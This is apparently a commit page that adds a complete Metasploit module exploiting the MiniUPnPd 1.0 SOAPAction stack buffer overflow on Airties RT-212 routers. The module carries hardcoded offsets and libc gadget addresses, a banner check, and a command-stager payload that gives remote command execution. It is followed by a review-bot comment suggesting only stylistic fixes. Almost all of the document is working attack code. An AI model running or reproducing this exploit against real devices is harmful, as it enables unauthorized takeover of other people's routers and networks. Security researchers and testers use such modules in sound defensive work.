
Commit 285d767

author
m-1-k-3
committed
initial commit of UPnP exploit for Airties devices
1 parent b6df023 commit 285d767

1 file changed

+131
-0
lines changed

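--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::CmdStager
+Rank = NormalRanking
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+'Description' => %q{
+This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
+present in the SOAPAction HTTP header handling.
+},
+'Author' =>
+[
+'hdm', # Vulnerability discovery
+'Dejan Lukan', # orig Metasploit module
+'Onur ALANBEL', # exploit for Airties router
+'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module for Airties router
+],
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'Arch' => ARCH_MIPSBE,
+'References' =>
+[
+[ 'CVE', '2013-0230' ],
+[ 'OSVDB', '89624' ],
+[ 'BID', '57608' ],
+[ 'EDB', '36839' ],
+[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
+],
+'Targets' =>
+[
+[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
+{
+'Offset' => 2048,
+'LibcBase' => 0x2aabd000,
+'System' => 0x00031AC0 ,
+'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
+}
+],
+],
+'DisclosureDate' => 'Mar 27 2013',
+'DefaultTarget' => 0))
+deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+
+register_options([
+Opt::RPORT(5555),
+], self.class)
+end
+
+def check
+begin
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => "/",
+})
+
+if res && res.headers['Server'] =~ /miniupnpd\/1.0/
+return Exploit::CheckCode::Detected
+end
+rescue ::Rex::ConnectionError
+return Exploit::CheckCode::Unknown
+end
+
+Exploit::CheckCode::Unknown
+end
+
+def exploit
+print_status("#{peer} - Accessing the vulnerable URL...")
+
+unless check == Exploit::CheckCode::Detected
+fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+end
+
+#
+# Build and send the HTTP request
+#
+print_status("#{peer} - Sending exploit to victim #{target.name}")
+execute_cmdstager(
+:flavor => :echo
+)
+end
+
+def execute_command(cmd, opts)
+# Build the SOAP Exploit
+# a valid action
+sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"
+sploit << rand_text_alpha_upper(target['Offset'])
+sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system
+sploit << rand_text_alpha_upper(24) # $s1 - $s6
+sploit << [target['LibcBase'] + target['CallSystem']].pack("N")
+
+# 0001CC94 addiu $a0, $sp, 0x18
+# 0001CC98 move $t9, $s0
+# 0001CC9C jalr $t9
+# 0001CCA0 li $a1, 1
+
+sploit << rand_text_alpha_upper(24) #filler
+sploit << cmd
+
+# data sent in the POST body
+data =
+"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
+"<SOAP-ENV:Envelope\r\n" +
+" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
+">\r\n" +
+"<SOAP-ENV:Body>\r\n" +
+"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
+"</ns1:action>\r\n" +
+"</SOAP-ENV:Body>\r\n" +
+"</SOAP-ENV:Envelope>\r\n"
+
+send_request_cgi({
+'method' => 'POST',
+'uri' => "/",
+'headers' => {
+'SOAPAction' => sploit,
+},
+'data' => data,
+})
+end
+end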
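Review bot: `fail_with(Failure::Unknown, ...)` in `exploit` is reached exactly when `check` did not return `Detected`, so the outcome is known rather than unknown; `Failure::NotVulnerable` (or `Failure::NotFound`, since `check` only inspects the `Server` banner) names that outcome, and the message "Failed to access the vulnerable URL" is misleading because `check` also returns `Unknown` when the banner simply does not match, e.g. `fail_with(Failure::NotVulnerable, "#{peer} - Server banner does not match MiniUPnPd 1.0")`. The target hash in `initialize` holds four bare numbers (`Offset`, `LibcBase`, `System`, `CallSystem`) with only one trailing comment; a comment above the hash recording which firmware image and library build the values were derived from would let a maintainer judge whether another Airties image is covered, as the target name is the only hint on the page. `check` deliberately returns `Detected` and not `Appears`/`Vulnerable`, which is correct for a banner-only probe, but a one-line comment such as `# banner match only; the overflow itself is not probed` would make that choice explicit. In `execute_command(cmd, opts)` the second parameter is never read, so `_opts` marks that deliberately, and `'System' => 0x00031AC0 ,` has a stray space before the comma.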
